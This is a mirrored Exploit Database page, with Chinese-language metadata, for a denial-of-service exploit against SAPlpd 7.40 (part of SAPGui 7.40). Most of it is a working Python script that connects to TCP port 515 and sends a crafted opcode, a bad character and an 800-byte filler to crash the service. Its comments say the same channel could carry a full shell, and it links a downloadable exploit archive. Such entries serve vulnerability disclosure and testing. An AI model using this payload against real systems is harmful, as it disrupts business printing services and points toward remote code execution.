SapLPD 7.40 – Denial of Service

• Exploit Database
• 13 阅读

• 作者： Peter Baris
  日期： 2016-12-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41030/

• # Exploit Title: SAPlpd 7.40 Denial of Service
  # Date: 2016-12-28
  # Exploit Author: Peter Baris
  # Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
  # Version: 7.40 all patch levels (as a part of SAPGui 7.40)
  # Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
  
  
  import socket
  
  # Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
  # So you can modify the DoS accordingly
  # The added 800 A's are just to show, that you can deliver a complete shell with the command
  
  DoS = ("\x03"+"\x0a"+"\x41"*800)
  
  
  s = socket.socket()
  s.settimeout(1)
  s.connect(('192.168.198.132', 515))
  print("[*] Crashing SAPlpd 7.40")
  print("[*] Payload length: "+str(len(DoS))+" bytes")
  s.send(DoS)
  s.close()